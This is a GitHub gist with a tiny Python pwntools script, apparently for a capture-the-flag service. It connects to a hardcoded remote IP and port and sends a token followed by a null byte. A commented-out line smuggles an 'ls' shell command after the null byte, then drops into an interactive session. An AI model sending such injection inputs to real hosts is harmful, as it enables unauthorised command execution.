Skip to content

Instantly share code, notes, and snippets.

@CreateRemoteThread
Created June 6, 2016 01:51
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save CreateRemoteThread/c06021c298887abac9b920a51ff1855a to your computer and use it in GitHub Desktop.
Save CreateRemoteThread/c06021c298887abac9b920a51ff1855a to your computer and use it in GitHub Desktop.
#!/usr/bin/python
import pwn
p = pwn.remote('120.26.120.82',9999)
p.send("py09ce12e1-b775-4bda-af37-8abd886478ee\0djksa;fjhklajkdlsfjl;kajsdlkfa\n")
print p.recv()
p.interactive()
# p.interactive()
# p.send("pi09ce12e1-b775-4bda-af37-8abd886478ee\0ls\"asdf'asdf")
# p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment